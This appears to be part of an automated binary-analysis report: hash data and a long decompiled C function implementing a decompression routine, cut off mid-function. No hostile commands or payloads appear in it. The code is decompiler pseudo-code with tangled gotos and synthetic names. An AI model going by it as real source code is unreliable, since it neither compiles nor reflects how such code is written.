Instruction Fuzzy Hash: E4A001746022828BD7408F35AA1A34D7AAAAAA5691B16806AAA19D6160EE3584609A01

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5BE7 Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00BB5BE7(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00BB4B23(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00BB3731(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00BB3CDD(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00BB476B(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E00BAA740(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x18) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E00BAA740(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E00BAA740(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x18);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x18) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E00BBF300(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00BB2474();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x18) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E00BBF300(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x14));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E00BB1D92(_t638, _t658 + 0x20);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
															if(_t322 < 0xf) {
																continue;
															}
															L137:
															goto L139;
														}
														L138:
														_t628 = _t322;
														goto L139;
													}
													L132:
													_t532 = 0x10;
													_t613 = _t605 >> _t532 - _t321;
													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
													 *_t643 =  *_t643 + (_t535 >> 3);
													 *(_t643 + 4) = _t535 & 0x00000007;
													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
													goto L140;
												} else {
													goto L130;
												}
												do {
													L130:
													 *_t493 =  *(_t493 - 4);
													_t493 = _t493 - 4;
													_t461 = _t461 - 1;
													__eflags = _t461;
												} while (_t461 != 0);
												goto L131;
											}
											L103:
											_t632 =  *(_t638 + 0x74);
											_t598 = _t638 + 0x7c;
											__eflags = _t632;
										}
										L97:
										_push(_t658 + 0x20);
										_t414 = E00BB38C2(_t638, _t643);
										__eflags = _t414;
										if(_t414 == 0) {
											goto L99;
										}
										goto L98;
									}
									L32:
									_t634 = _t460 - 0x106;
									__eflags = _t634 - 8;
									if(_t634 >= 8) {
										_t478 = (_t634 >> 2) - 1;
										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
										__eflags = _t634;
									} else {
										_t478 = 0;
									}
									_t632 = _t634 + 2;
									__eflags = _t478;
									if(_t478 != 0) {
										_t444 = E00BAA740(_t643);
										_t582 = 0x10;
										_t632 = _t632 + (_t444 >> _t582 - _t478);
										_t585 =  *(_t643 + 4) + _t478;
										 *_t643 =  *_t643 + (_t585 >> 3);
										_t586 = _t585 & 0x00000007;
										__eflags = _t586;
										 *(_t643 + 4) = _t586;
									}
									_t418 = E00BAA740(_t643);
									_t419 =  *(_t638 + 0x1010);
									_t617 = _t418 & 0x0000fffe;
									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
										L39:
										_t479 = 0xf;
										_t420 = _t419 + 1;
										__eflags = _t420 - _t479;
										if(_t420 >= _t479) {
											L45:
											_t546 =  *(_t643 + 4) + _t479;
											 *(_t643 + 4) = _t546 & 0x00000007;
											_t422 = _t546 >> 3;
											 *_t643 =  *_t643 + _t422;
											_t548 = 0x10;
											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
											asm("sbb eax, eax");
											_t423 = _t422 & _t551;
											__eflags = _t423;
											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
											goto L46;
										}
										L40:
										_t575 = _t638 + (_t420 + 0x3e4) * 4;
										while(1) {
											L41:
											__eflags = _t617 -  *_t575;
											if(_t617 <  *_t575) {
												break;
											}
											L42:
											_t420 = _t420 + 1;
											_t575 = _t575 + 4;
											__eflags = _t420 - 0xf;
											if(_t420 < 0xf) {
												continue;
											}
											L43:
											goto L45;
										}
										L44:
										_t479 = _t420;
										goto L45;
									} else {
										L38:
										_t576 = 0x10;
										_t625 = _t617 >> _t576 - _t419;
										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
										 *_t643 =  *_t643 + (_t579 >> 3);
										 *(_t643 + 4) = _t579 & 0x00000007;
										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
										L46:
										_t425 = _t424 & 0x0000ffff;
										__eflags = _t425 - 4;
										if(_t425 >= 4) {
											_t643 = (_t425 >> 1) - 1;
											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
											__eflags = _t425;
										} else {
											_t643 = 0;
										}
										_t428 = _t425 + 1;
										 *(_t658 + 0x18) = _t428;
										_t471 = _t428;
										 *(_t658 + 0x10) = _t471;
										__eflags = _t643;
										if(_t643 == 0) {
											L64:
											_t643 = _t638 + 4;
											goto L65;
										} else {
											L50:
											__eflags = _t643 - 4;
											if(__eflags < 0) {
												L72:
												_t359 = E00BB80CA(_t638 + 4);
												_t514 = 0x20;
												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x18);
												_t517 =  *(_t638 + 8) + _t643;
												 *(_t658 + 0x10) = _t471;
												_t643 = _t638 + 4;
												 *_t643 =  *_t643 + (_t517 >> 3);
												 *(_t643 + 4) = _t517 & 0x00000007;
												L65:
												__eflags = _t471 - 0x100;
												if(_t471 > 0x100) {
													_t632 = _t632 + 1;
													__eflags = _t471 - 0x2000;
													if(_t471 > 0x2000) {
														_t632 = _t632 + 1;
														__eflags = _t471 - 0x40000;
														if(_t471 > 0x40000) {
															_t632 = _t632 + 1;
															__eflags = _t632;
														}
													}
												}
												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
												 *(_t638 + 0x68) =  *(_t638 + 0x64);
												 *(_t638 + 0x64) =  *(_t638 + 0x60);
												 *(_t638 + 0x60) = _t471;
												__eflags =  *((char*)(_t638 + 0x4c44));
												 *(_t638 + 0x74) = _t632;
												if( *((char*)(_t638 + 0x4c44)) == 0) {
													L73:
													_t598 = _t638 + 0x7c;
													_t519 =  *_t598;
													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
													_t651 = _t519 - _t471;
													__eflags = _t651 - _t366;
													if(_t651 >= _t366) {
														L92:
														__eflags = _t632;
														if(_t632 == 0) {
															goto L161;
														}
														L93:
														_t472 =  *(_t638 + 0xe6dc);
														do {
															L94:
															_t473 = _t472 & _t651;
															_t651 = _t651 + 1;
															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
															_t598 = _t638 + 0x7c;
															_t472 =  *(_t638 + 0xe6dc);
															 *_t598 =  *_t598 + 0x00000001 & _t472;
															_t632 = _t632 - 1;
															__eflags = _t632;
														} while (_t632 != 0);
														goto L161;
													}
													L74:
													__eflags = _t519 - _t366;
													if(_t519 >= _t366) {
														goto L92;
													}
													L75:
													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
													_t474 = _t371 + _t651;
													_t652 = _t371 + _t519;
													 *_t598 = _t519 + _t632;
													__eflags =  *(_t658 + 0x10) - _t632;
													if( *(_t658 + 0x10) >= _t632) {
														L80:
														__eflags = _t632 - 8;
														if(_t632 < 8) {
															L84:
															__eflags = _t632;
															if(_t632 != 0) {
																 *_t652 =  *_t474;
																__eflags = _t632 - 1;
																if(_t632 > 1) {
																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
																	__eflags = _t632 - 2;
																	if(_t632 > 2) {
																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
																		__eflags = _t632 - 3;
																		if(_t632 > 3) {
																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
																			__eflags = _t632 - 4;
																			if(_t632 > 4) {
																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
																				__eflags = _t632 - 5;
																				if(_t632 > 5) {
																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 > 6) {
																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
																					}
																				}
																			}
																		}
																	}
																}
															}
															goto L161;
														}
														L81:
														_t381 = _t632 >> 3;
														__eflags = _t381;
														 *(_t658 + 0x18) = _t381;
														_t640 = _t381;
														do {
															L82:
															E00BBF300(_t652, _t474, 8);
															_t658 = _t658 + 0xc;
															_t474 = _t474 + 8;
															_t652 = _t652 + 8;
															_t632 = _t632 - 8;
															_t640 = _t640 - 1;
															__eflags = _t640;
														} while (_t640 != 0);
														_t638 =  *((intOrPtr*)(_t658 + 0x14));
														_t598 =  *(_t658 + 0x1c);
														goto L84;
													}
													L76:
													__eflags = _t632 - 8;
													if(_t632 < 8) {
														goto L84;
													}
													L77:
													_t522 = _t632 >> 3;
													__eflags = _t522;
													do {
														L78:
														_t632 = _t632 - 8;
														 *_t652 =  *_t474;
														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
														_t390 =  *((intOrPtr*)(_t474 + 7));
														_t474 = _t474 + 8;
														 *((char*)(_t652 + 7)) = _t390;
														_t652 = _t652 + 8;
														_t522 = _t522 - 1;
														__eflags = _t522;
													} while (_t522 != 0);
													goto L84;
												} else {
													L70:
													_push( *(_t638 + 0xe6dc));
													_push(_t638 + 0x7c);
													_push(_t471);
													goto L71;
												}
											}
											L51:
											if(__eflags <= 0) {
												_t656 = _t638 + 4;
											} else {
												_t439 = E00BB80CA(_t638 + 4);
												_t569 = 0x24;
												_t572 = _t643 - 4 +  *(_t638 + 8);
												_t656 = _t638 + 4;
												_t471 = (_t439 >> _t569 - _t643 << 4) +  *(_t658 + 0x18);
												 *_t656 =  *_t656 + (_t572 >> 3);
												 *(_t656 + 4) = _t572 & 0x00000007;
											}
											_t429 = E00BAA740(_t656);
											_t430 =  *(_t638 + 0x1efc);
											_t621 = _t429 & 0x0000fffe;
											__eflags = _t621 -  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4));
											if(_t621 >=  *((intOrPtr*)(_t638 + 0x1e7c + _t430 * 4))) {
												L56:
												_t657 = 0xf;
												_t431 = _t430 + 1;
												__eflags = _t431 - _t657;
												if(_t431 >= _t657) {
													L62:
													_t555 =  *(_t638 + 8) + _t657;
													 *(_t638 + 8) = _t555 & 0x00000007;
													_t433 = _t555 >> 3;
													 *(_t638 + 4) =  *(_t638 + 4) + _t433;
													_t557 = 0x10;
													_t560 =  *((intOrPtr*)(_t638 + 0x1ebc + _t657 * 4)) + (_t621 -  *((intOrPtr*)(_t638 + 0x1e78 + _t657 * 4)) >> _t557 - _t657);
													__eflags = _t560 -  *((intOrPtr*)(_t638 + 0x1e78));
													asm("sbb eax, eax");
													_t434 = _t433 & _t560;
													__eflags = _t434;
													_t435 =  *(_t638 + 0x2b00 + _t434 * 2) & 0x0000ffff;
													goto L63;
												}
												L57:
												_t562 = _t638 + (_t431 + 0x79f) * 4;
												while(1) {
													L58:
													__eflags = _t621 -  *_t562;
													if(_t621 <  *_t562) {
														break;
													}
													L59:
													_t431 = _t431 + 1;
													_t562 = _t562 + 4;
													__eflags = _t431 - 0xf;
													if(_t431 < 0xf) {
														continue;
													}
													L60:
													goto L62;
												}
												L61:
												_t657 = _t431;
												goto L62;
											} else {
												L55:
												_t563 = 0x10;
												_t624 = _t621 >> _t563 - _t430;
												_t566 = ( *(_t624 + _t638 + 0x1f00) & 0x000000ff) +  *(_t656 + 4);
												 *_t656 =  *_t656 + (_t566 >> 3);
												 *(_t656 + 4) = _t566 & 0x00000007;
												_t435 =  *(_t638 + 0x2300 + _t624 * 2) & 0x0000ffff;
												L63:
												_t471 = _t471 + (_t435 & 0x0000ffff);
												__eflags = _t471;
												 *(_t658 + 0x10) = _t471;
												goto L64;
											}
										}
									}
								}
								L28:
								__eflags =  *((char*)(_t638 + 0x4c44));
								if( *((char*)(_t638 + 0x4c44)) == 0) {
									L30:
									_t598 = _t638 + 0x7c;
									 *( *((intOrPtr*)(_t638 + 0x4b40)) +  *_t598) = _t460;
									 *_t598 =  *_t598 + 1;
									continue;
								}
								L29:
								 *(_t638 + 0x7c) =  *(_t638 + 0x7c) + 1;
								 *(E00BB1B21(_t638 + 0x4b44,  *(_t638 + 0x7c))) = _t460;
								goto L0;
							}
						}
						L13:
						__eflags = _t483 -  *_t598;
						if(_t483 ==  *_t598) {
							goto L18;
						}
						L14:
						E00BB4B23(_t638);
						_t415 =  *((intOrPtr*)(_t638 + 0x4c5c));
						__eflags = _t415 -  *((intOrPtr*)(_t638 + 0x4c4c));
						if(__eflags > 0) {
							goto L100;
						}
						L15:
						if(__eflags < 0) {
							L17:
							__eflags =  *((char*)(_t638 + 0x4c50));
